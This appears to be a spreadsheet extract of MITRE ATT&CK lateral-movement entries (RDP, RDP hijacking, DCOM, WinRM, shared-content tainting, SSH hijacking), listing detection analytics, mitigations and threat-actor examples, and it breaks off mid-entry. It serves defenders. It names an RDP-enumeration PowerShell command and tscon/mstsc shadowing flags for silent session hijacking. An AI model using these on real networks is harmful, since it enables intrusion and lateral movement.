Monitor for user accounts logged into systems they would not normally access or abnormal access patterns, such as multiple systems over a relatively short period of time. Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. For example, in macOS you can review logs for "screensharingd" and "Authentication" event messages. (Citation: Lockboxx ARD 2019)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
Note: When using Security event id 4624, %$ means user names that do not end with $ character. Usually, computer accounts or local system accounts names end with the $ character. When using Security event 4624, UserName and UserLogonId correspond to TargetUserName and TargetLogonId respectively. When using Security event 4624, LogonType 3 corresponds to a Network Logon
&lt;h4&gt; Analytic 1 - New services being created under network logon sessions by non-system users &lt;/h4&gt;
&lt;code&gt;remote_logon_sessions = filter Hostname, UserName, UserLogonId, SourceIp where
  event_id == "4624" AND
  LogonType == "3" AND
  UserName NOT LIKE '%$' 
new_services = filter UserName, UserLogonId, ServiceName where event_id = "4697"
suspicious_services = filter l.UserName, l.UserLogonId, l.SourceIp, s.Servicename
FROM remote_logon_sessions l
INNER JOIN new_services s
ON l.UserLogonId = s.UserLogonId &lt;/code&gt;
Module Load
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes, that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
Note: On Windows, Sysmon Event ID 7 (Image loaded) can be used to monitor the loading of DLLs into processes, including those designed to accept remote connections. This is a particularly noisy event and can generate a large volume of data, so we recommend baselining and filtering out any known benign processes and module to help reduce the number of events that are produced.
Network Connection Creation
Monitor for newly constructed network connections that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as RDP, telnet, SSH, and VNC. Monitor network connections involving common remote management protocols, such as ports tcp:3283 and tcp:5900, as well as ports tcp: 3389 and tcp:22 for remote login.
Note: Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on network service protocols such as SSH and RDP.
&lt;h4&gt;Analytic 1 - Suspicious Protocols&lt;/h4&gt;
&lt;code&gt;suspicious_protocol = filter network_traffic where ((server_port = “636” AND protocol = “6”) OR (server_port = “389” AND protocol = “17”))&lt;/code&gt;
Network Share Access
Monitor interactions with network shares, such as reads or file transfers, using remote services such as Server Message Block (SMB).
Network Traffic Flow
Monitor network data for uncommon data flows that may be related to abuse of [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as RDP, telnet, SSH, and VNC.
Process Creation
Monitor for newly executed processes that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as RDP, telnet, SSH, and VNC. The adversary may then perform actions that spawn additional processes as the logged-on user.
WMI Creation
Monitor for newly constructed WMI objects that is often used to log into a service that accepts remote connects.  
Disable or Remove Feature or Program
If remote services, such as the ability to make direct connections to cloud virtual machines, are not required, disable these connection types where feasible.
Multi-factor Authentication
Use multi-factor authentication on remote service logons where possible.
User Account Management
Limit the accounts that may use remote services. Limit the permissions for accounts that are at higher risk of compromise; for example, configure SSH so users can only run specific programs.
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used the WebDAV protocol to execute [Ryuk](https://attack.mitre.org/software/S0446) payloads hosted on network file shares.(Citation: Mandiant FIN12 Oct 2021)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) has the ability to use RPC for lateral movement.(Citation: Palo Alto Brute Ratel July 2022)
Kivars
[Kivars](https://attack.mitre.org/software/S0437) has the ability to remotely trigger keyboard input and mouse clicks. (Citation: TrendMicro BlackTech June 2017)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) can manage remote screen sessions.(Citation: ESET DazzleSpy Jan 2022)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) can propagate via peer-to-peer communication and updates using RPC.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
</t>
  </si>
  <si>
    <t xml:space="preserve">Logon Session Creation
Monitor for newly constructed logon behavior to cloud services. For example, in Azure AD, consider using Identity Protection to monitor for suspicious login behaviors to cloud resources. (Citation: Protecting Microsoft 365 From On-Premises Attacks)
Multi-factor Authentication
Use multi-factor authentication on cloud services whenever possible.
Privileged Account Management
Limit the number of high-privileged domain and cloud accounts, and ensure that these are not used for day-to-day operations. Ensure that on-premises accounts do not have privileged cloud permissions and that isolated, cloud-only accounts are used for managing cloud environments.(Citation: Protecting Microsoft 365 From On-Premises Attacks)
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) used compromised Azure credentials for credential theft activity and lateral movement to on-premises systems.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has leveraged compromised high-privileged on-premises accounts synced to Office 365 to move laterally into a cloud environment, including through the use of Azure AD PowerShell.(Citation: Mandiant Remediation and Hardening Strategies for Microsoft 365)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for newly constructed files from files that write or overwrite many files to a network shared directory may be suspicious.
File Modification
Monitor for files that write or overwrite many files to a network shared directory may be suspicious.
Network Share Access
Monitor for unexpected and abnormal accesses to network shares, especially those also associated with file activity.
Process Creation
Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.
Antivirus/Antimalware
Anti-virus can be used to automatically quarantine suspicious files.(Citation: Mandiant Cloudy Logs 2023)
Execution Prevention
Identify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using application control (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)
Exploit Protection
Use utilities that detect or mitigate common features used in exploitation, such as the Microsoft Enhanced Mitigation Experience Toolkit (EMET).
Restrict File and Directory Permissions
Protect shared folders by minimizing users who have write access.
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has placed malware on file shares and given it the same name as legitimate documents on the share.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) used a virus that propagates by infecting executables stored on shared drives.(Citation: Kaspersky Darkhotel)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has injected malicious macros into all Word and Excel documents on mapped network drives.(Citation: ESET Gamaredon June 2020)
Conti
[Conti](https://attack.mitre.org/software/S0575) can spread itself by infecting other remote machines via network shared drives.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020) 
H1N1
[H1N1](https://attack.mitre.org/software/S0132) has functionality to copy itself to network shares.(Citation: Cisco H1N1 Part 2)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can replace legitimate software or documents in the compromised network with their trojanized versions, in an attempt to propagate itself within the network.(Citation: ESET InvisiMole June 2020)
Miner-C
[Miner-C](https://attack.mitre.org/software/S0133) copies itself into the public folder of Network Attached Storage (NAS) devices and infects new victims who open the file.(Citation: Softpedia MinerC)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can spread itself by infecting other portable executable files on networks shared drives.(Citation: Eset Ramsay May 2020)	
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) infects remote servers via network shares and by infecting WinCC database views with malicious code.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) has copied itself to and infected files in network drives for propagation.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro Ursnif File Dec 2014)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
monitor service creation that uses cmd.exe /k or cmd.exe /c in its arguments to detect RDP session hijacking. Windows PowerShell log Event ID 4104 (PS script execution) can be used to capture PowerShell script block contents which may contain commands used as a precursor to RDP hijacking. For example, the following command in a PowerShell script block may be used to enumerate the systems on a network which have RDP access: &lt;code&gt;Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName&lt;/code&gt;.
Logon Session Creation
Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Windows security log Event ID 4624 (An account was successfully logged on) is generated when a user logs onto a remote machine using RDP.
Correlating logon session creation events with RDP network flows can provide a clearer picture of RDP activity and serve as a useful starting point for investigating suspicious RDP connections.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Analysis frameworks such as Zeek can be used to capture, decode, and alert on network protocols including RDP.
Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. RDP sessions may be split up into multiple flows and would therefore need to be aggregated.
Anomaly detection using machine learning or other methods based on baselined RDP network flows may be a viable approach to alerting on potential RDP session hijacking.
Process Creation
Consider monitoring processes for tscon.exe usage. Using tscon.exe to hijack an RDP session requires SYSTEM level permissions. Therefore, we recommend also looking for Privilege Escalation techniques that may be used for this purpose in conjunction with RDP Session Hijacking.
In addition to tscon.exe,  mstsc.exe can similarly be used to hijack existing RDP sessions. In this case, we recommend looking for the command-line parameters of &lt;code&gt;/noconsentPrompt&lt;/code&gt; and &lt;code&gt;/shadow:&lt;/code&gt;, which allow for stealthy hijacking of an RDP session with no prompt and without kicking off the existing session.
Audit
Audit the Remote Desktop Users group membership regularly. Remove unnecessary accounts and groups from Remote Desktop Users groups.
Disable or Remove Feature or Program
Disable the RDP service if it is unnecessary.
Limit Access to Resource Over Network
Use remote desktop gateways.
Network Segmentation
Enable firewall rules to block RDP traffic between network security zones within a network.
Operating System Configuration
Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active. Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server.(Citation: Windows RDP Sessions)
Privileged Account Management
Consider removing the local Administrators group from the list of groups allowed to log in through RDP.
User Account Management
Limit remote user permissions if remote access is necessary.
Axiom
[Axiom](https://attack.mitre.org/groups/G0001) has targeted victims with remote administration tools including RDP.(Citation: Novetta-Axiom)
WannaCry
[WannaCry](https://attack.mitre.org/software/S0366) enumerates current remote desktop sessions and tries to execute the malware on each session.(Citation: LogRhythm WannaCry)
</t>
  </si>
  <si>
    <t xml:space="preserve">Module Load
Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017)
Note: Sysmon Event ID 7 (Image loaded) can be used to monitor for suspicious DLLs loaded by the DCOM Server Process Launcher which runs inside of svchost.exe. This is a particularly noisy event and can generate a large volume of data, so we recommend baselining and filtering out any known benign svchost.exe module loads that occur as part of its typical operation.
Network Connection Creation
Monitor for newly constructed network connections that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines using Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user. Monitor for any influxes or abnormal increases in DCOM related Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic (typically over port 135).
Note: Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on RPC network flows. Traffic to the RPC Endpoint Mapper will always have the destination port of 135. Assuming success, RPC traffic will continue to the endpoint. The endpoint and the client both bind to dynamically assigned ports (on Windows, this is typically greater than 49152). The traffic between the client and endpoint can be detected by looking at traffic to 135 followed by traffic where the source and destination ports are at least 49152.
&lt;h4&gt; Analytic 1 -  RPC Mapper &lt;/h4&gt;
&lt;code&gt;rpc_mapper = filter flows where (dest_port == 135)
rpc_endpoint = filter flows where (dest_port &gt;= 49152 and src_port &gt;= 49152)
rpc = join rpc_mapper, rpc_endpoint where (
 (rpc_mapper.time &lt; rpc_endpoint.time &lt; rpc_mapper.time + 2 seconds) AND
 (rpc_mapper.src_ip == rpc_endpoint.src_ip AND rpc_mapper.dest_ip == rpc_endpoint.dest_ip))&lt;/code&gt;
Process Creation
Monitor for newly executed processes associated with DCOM activity, especially those invoked by a user different than the one currently logged on. Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also precede malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
The Microsoft Management Console (mmc.exe) can be by used by threat actors used to spawn arbitrary processes through DCOM. The typical process tree for this method looks like: svchost.exe —&gt; mmc.exe —&gt; &lt;some_process&gt;.exe. 
Accordingly, look for process creation events of mmc.exe in conjunction with the -Embedding command-line argument, along with suspicious child processes that can be used for malicious purposes, such as cmd.exe, reg.exe, etc.
Similar to the Microsoft Management Console, Excel can also be used to execute processes through DCOM. In this case, the typical process tree looks like: svchost.exe —&gt; excel.exe —&gt; &lt;some_process&gt;.exe. 
Look for process creation events of excel.exe in conjunction with the /automation -Embedding command-line argument, along with suspicious child processes that can be used for malicious purposes, such as cmd.exe, reg.exe, etc.
Application Isolation and Sandboxing
Ensure all COM alerts and Protected View are enabled.(Citation: Microsoft Protected View)
Disable or Remove Feature or Program
Consider disabling DCOM through Dcomcnfg.exe.(Citation: Microsoft Disable DCOM)
Network Segmentation
Enable Windows firewall, which prevents DCOM instantiation by default.
Privileged Account Management
Modify Registry settings (directly or using Dcomcnfg.exe) in `HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{{AppID_GUID}}` associated with the process-wide security of individual COM applications.(Citation: Microsoft Process Wide Com Keys)
Modify Registry settings (directly or using Dcomcnfg.exe) in `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole` associated with system-wide security defaults for all COM applications that do not set their own process-wide security.(Citation: Microsoft System Wide Com Keys) (Citation: Microsoft COM ACL)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can deliver Beacon payloads for lateral movement by leveraging remote COM execution.(Citation: Cobalt Strike DCOM Jan 2017)
Empire
[Empire](https://attack.mitre.org/software/S0363) can utilize &lt;code&gt;Invoke-DCOM&lt;/code&gt; to leverage remote COM execution for lateral movement.(Citation: Github PowerShell Empire)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use `System` namespace methods to execute lateral movement using DCOM.(Citation: GitHub SILENTTRINITY Modules July 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may invoke a WinRM script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement)
Logon Session Creation
Monitor for user accounts logging into the system via [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. 
Network Connection Creation
Monitor for newly constructed network connections using Windows Remote Management (WinRM), such as remote WMI connection attempts (typically over port 5985 when using HTTP and 5986 for HTTPS).
Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on RPC network flows.
When a Windows Remote Management connection is opened, the client sends HTTP requests to port 5985 for HTTP or 5986 for HTTPS on the target host. Each HTTP(S) request to the URI “/wsman” is called, and other information is set in the headers. Depending on the operation, the HTTP method may vary (i.e., GET, POST, etc.). This analytic would detect Remote PowerShell, as well as other communications that rely on WinRM. Additionally, it outputs the executable on the client host, the connection information, and the hostname of the target host. Look for network connections to port 5985 and 5986. To really decipher what is going on, these outputs should be fed into something that can do packet analysis.
Note: Traffic to the RPC Endpoint Mapper will always have the destination port of 135. Assuming success, RPC traffic will continue to the endpoint. The endpoint and the client both bind to dynamically assigned ports (on Windows, this is typically greater than 49152). The traffic between the client and endpoint can be detected by looking at traffic to 135 followed by traffic where the source and destination ports are at least 49152.
&lt;h4&gt;Analytic 1 - RPC Activity &lt;/h4&gt;
&lt;code&gt;rpc_mapper = filter flows where (dest_port == 135)
rpc_endpoint = filter flows where (dest_port &gt;= 49152 and src_port &gt;= 49152)
rpc = join rpc_mapper, rpc_endpoint where (
 (rpc_mapper.time &lt; rpc_endpoint.time &lt; rpc_mapper.time + 2 seconds) AND
 (rpc_mapper.src_ip == rpc_endpoint.src_ip AND rpc_mapper.dest_ip == rpc_endpoint.dest_ip)) &lt;/code&gt;
&lt;h4&gt;Analytic 2 - WinRM &lt;/h4&gt;
&lt;code&gt;winrm = filter flow where (dest_port == 5985)
winrm_s = filter flow where (dest_port == 5986)&lt;/code&gt;
Process Creation
Monitor for newly executed processes that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM), as well as service processes such as &lt;code&gt;wmiprvse.exe&lt;/code&gt; on destination hosts.
Service Metadata
Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior.
Disable or Remove Feature or Program
Disable the WinRM service.
Network Segmentation
If the service is necessary, lock down critical enclaves with separate WinRM infrastructure and follow WinRM best practices on use of host firewalls to restrict WinRM access to allow communication only to/from specific devices.(Citation: NSA Spotting)
Privileged Account Management
If the service is necessary, lock down critical enclaves with separate WinRM accounts and permissions.
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used WinRM via PowerShell to execute commands and payloads on remote hosts.(Citation: Symantec RAINDROP January 2021)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used WinRM for lateral movement.(Citation: NCC Group Chimera January 2021)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has leveraged `WMI` to move laterally within a compromised network via application servers and SQL servers.(Citation: Sygnia Elephant Beetle Jan 2022)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used WinRM to enable remote execution.(Citation: SecureWorks BRONZE UNION June 2017)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used Window Remote Management to move laterally through a victim network.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use WinRM for pivoting.(Citation: Palo Alto Brute Ratel July 2022)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use &lt;code&gt;WinRM&lt;/code&gt; to execute a payload on a remote host.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) tracks `TrustedHosts` and can move laterally to these targets via WinRM.(Citation: GitHub SILENTTRINITY Modules July 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Logon Session Creation
Monitor for user accounts logged into systems associated with RDP (ex: Windows EID 4624 Logon Type 10). Other factors, such as access patterns (ex: multiple systems over a relatively short period of time) and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.
Monitoring logon and logoff events for hosts on the network is very important for situational awareness. This information can be used as an indicator of unusual activity as well as to corroborate activity seen elsewhere.
Could be applied to a number of different types of monitoring depending on what information is desired. Some use cases include monitoring for all remote connections and building login timelines for users. Logon events are Windows Event Code 4624 for Windows Vista and above, 518 for pre-Vista. Logoff events are 4634 for Windows Vista and above, 538 for pre-Vista.
&lt;h4&gt;Analytic &lt;/h4&gt; 
&lt;code&gt;filtered_logons = filter logon_events where ( (event_id = "4624") AND user NOT IN TOP30(user))&lt;/code&gt;
Logon Session Metadata
Monitor authentication logs and analyze for unusual access patterns. A remote desktop logon, through RDP, may be typical of a system administrator or IT support, but only from select workstations. Monitoring remote desktop logons and comparing to known/approved originating systems can detect lateral movement of an adversary.
&lt;h4&gt; Analytic &lt;/h4&gt;
&lt;code&gt;suspicious_logon = filter logons where (event_id = “4624" AND AuthenticationPackageName = 'Negotiate' AND Severity = "Information" AND logon_type = "10")&lt;/code&gt;
Network Connection Creation
Monitor for newly constructed network connections (typically over port 3389) that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.
Network Traffic Flow
Monitor network traffic for uncommon data flows that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP).
The Remote Desktop Protocol (RDP), built in to Microsoft operating systems, allows a user to remotely log in to the desktop of another host. It allows for interactive access of the running windows, and forwards key presses, mouse clicks, etc. Network administrators, power users, and end-users may use RDP for day-to-day operations. From an adversary’s perspective, RDP provides a means to laterally move to a new host. Determining which RDP connections correspond to adversary activity can be a difficult problem in highly dynamic environments, but will be useful in identifying the scope of a compromise.
Remote Desktop can be detected in several ways
- Network connections to port 3389/tcp (assuming use of the default port)
- Packet capture analysis
- Windows security logs (Event ID 4624, 4634, 4647, 4778)
- Detecting network connections from &lt;code&gt;mstsc.exe&lt;/code&gt;
- Execution of the process &lt;code&gt;rdpclip.exe&lt;/code&gt;
- Runs as the clipboard manager on the RDP target if clipboard sharing is enabled
&lt;h4&gt; Analytic 1 &lt;/h4&gt;
&lt;code&gt;rdp_start = filter flow_start where (port == "3389")
rdp_end = filter flow_start where (port == "3389")
rdp = group flow_start, flow_end by src_ip, src_port, dest_ip, dest_port &lt;/code&gt;
Process Creation
Monitor for newly executed processes (such as &lt;code&gt;mstsc.exe&lt;/code&gt;) that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions that spawn additional processes as the logged-on user.
Audit
Audit the Remote Desktop Users group membership regularly. Remove unnecessary accounts and groups from Remote Desktop Users groups.
Disable or Remove Feature or Program
Disable the RDP service if it is unnecessary.
Limit Access to Resource Over Network
Use remote desktop gateways.
Multi-factor Authentication
Use multi-factor authentication for remote logins.(Citation: Berkley Secure)
Network Segmentation
Do not leave RDP accessible from the internet. Enable firewall rules to block RDP traffic between network security zones within a network.
Operating System Configuration
Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active. Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server.(Citation: Windows RDP Sessions)
Privileged Account Management
Consider removing the local Administrators group from the list of groups allowed to log in through RDP.
User Account Management
Limit remote user permissions if remote access is necessary.
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used RDP to access specific network hosts of interest.(Citation: DFIR Conti Bazar Nov 2021)
C0018
During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors opened a variety of ports to establish RDP connections, including ports 28035, 32467, 41578, and 46892.(Citation: Costa AvosLocker May 2022)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used RDP sessions from public-facing systems to internal servers.(Citation: CrowdStrike StellarParticle January 2022)
APT1
The [APT1](https://attack.mitre.org/groups/G0006) group is known to have used RDP during operations.(Citation: FireEye PLA)
APT3
[APT3](https://attack.mitre.org/groups/G0022) enables the Remote Desktop Protocol for persistence.(Citation: aptsim) [APT3](https://attack.mitre.org/groups/G0022) has also interacted with compromised systems to browse and copy files through RDP sessions.(Citation: Twitter Cglyer Status Update APT3 eml)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has been seen using RDP for lateral movement and persistence, in some cases employing the rdpwinst tool for mangement of multiple sessions.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used RDP for lateral movement.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
Axiom
[Axiom](https://attack.mitre.org/groups/G0001) has used RDP during operations.(Citation: Novetta-Axiom)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Remote Desktop to log on to servers interactively and manually copy files to remote hosts.(Citation: RedCanary Mockingbird May 2020)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used RDP to access targeted systems.(Citation: Cycraft Chimera April 2020)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has used Remote Desktop Protocol to conduct lateral movement.(Citation: Group IB Cobalt Aug 2017)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has moved laterally via RDP.(Citation: US-CERT TA18-074A)
FIN10
[FIN10](https://attack.mitre.org/groups/G0051) has used RDP to move laterally to systems in the victim environment.(Citation: FireEye FIN10 June 2017)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has remotely accessed compromised environments via Remote Desktop Services (RDS) for lateral movement.(Citation: Mandiant FIN13 Aug 2022)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) used RDP to move laterally in victim networks.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has used RDP to move laterally in victim environments.(Citation: CrowdStrike Carbon Spider August 2021)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used RDP for lateral movement.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used RDP to log in and move laterally in the target environment.(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has used remote desktop sessions for lateral movement.(Citation: SecureWorks August 2019)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used RDP for direct remote point-and-click access.(Citation: Netscout Stolen Pencil Dec 2018)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware SierraCharlie uses RDP for propagation.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has targeted RDP credentials and used it to move through the victim environment.(Citation: FireEye APT40 March 2019) 
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used Remote Desktop Services to copy tools on targeted systems.(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used Remote Desktop Protocol for lateral movement. The group has also used tunneling tools to tunnel RDP into the environment.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: Crowdstrike GTR2020 Mar 2020)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) attempted to use RDP to move laterally.(Citation: Cymmetria Patchwork)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has used RDP for lateral movement.(Citation: Group IB Silence Sept 2018)	
TEMP.Veles
[TEMP.Veles](https://attack.mitre.org/groups/G0088) utilized RDP throughout an operation.(Citation: FireEye TRITON 2019)	
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used RDP for lateral movement and to deploy ransomware interactively.(Citation: CrowdStrike Grim Spider May 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: Mandiant FIN12 Oct 2021)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used RDP connections to move across the victim network.(Citation: PWC Cloud Hopper April 2017)(Citation: District Court of NY APT10 Indictment December 2018)
Carbanak
[Carbanak](https://attack.mitre.org/software/S0030) enables concurrent Remote Desktop Protocol (RDP) sessions.(Citation: FireEye CARBANAK June 2017)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can start a VNC-based remote desktop server and tunnel the connection through the already established C2 channel.(Citation: cobaltstrike manual)(Citation: Cybereason Bumblebee August 2022)
DarkComet
[DarkComet](https://attack.mitre.org/software/S0334) can open an active screen of the victim’s machine and take control of the mouse and keyboard.(Citation: Malwarebytes DarkComet March 2018)
Imminent Monitor
[Imminent Monitor](https://attack.mitre.org/software/S0434) has a module for performing remote desktop access.(Citation: QiAnXin APT-C-36 Feb2019)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) can enable remote desktop on the victim's machine.(Citation: Github Koadic)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can enable/disable RDP connection and can start a remote desktop session using a browser web socket client.(Citation: GitHub Pupy)
Pysa
[Pysa](https://attack.mitre.org/software/S0583) has laterally moved using RDP connections.(Citation: CERT-FR PYSA April 2020) 
QuasarRAT
[QuasarRAT](https://attack.mitre.org/software/S0262) has a module for performing remote desktop access.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)
Revenge RAT
[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin to perform RDP access.(Citation: Cylance Shaheen Nov 2018)
SDBbot
[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use RDP to connect to victim's machines.(Citation: Proofpoint TA505 October 2019)
ServHelper
[ServHelper](https://attack.mitre.org/software/S0382) has commands for adding a remote desktop user and sending RDP traffic to the attacker through a reverse SSH tunnel.(Citation: Proofpoint TA505 Jan 2019)
WarzoneRAT
[WarzoneRAT](https://attack.mitre.org/software/S0670) has the ability to control an infected PC using RDP.(Citation: Check Point Warzone Feb 2020)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) has remote desktop functionality.(Citation: Talos ZxShell Oct 2014) 
jRAT
[jRAT](https://attack.mitre.org/software/S0283) can support RDP control.(Citation: Kaspersky Adwind Feb 2016)
njRAT
[njRAT](https://attack.mitre.org/software/S0385) has a module for performing remote desktop access.(Citation: Fidelis njRAT June 2013)
zwShell
[zwShell](https://attack.mitre.org/software/S0350) has used RDP for lateral movement.(Citation: McAfee Night Dragon)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may hijack a legitimate user's SSH session to move laterally within an environment.
Logon Session Creation
Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.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Process Creation
Monitor newly executed processes that may hijack a legitimate user's SSH session to move laterally within an environment.
Disable or Remove Feature or Program
Ensure that agent forwarding is disabled on systems that do not explicitly require this feature to prevent misuse. (Citation: Symantec SSH and ssh-agent)
Password Policies
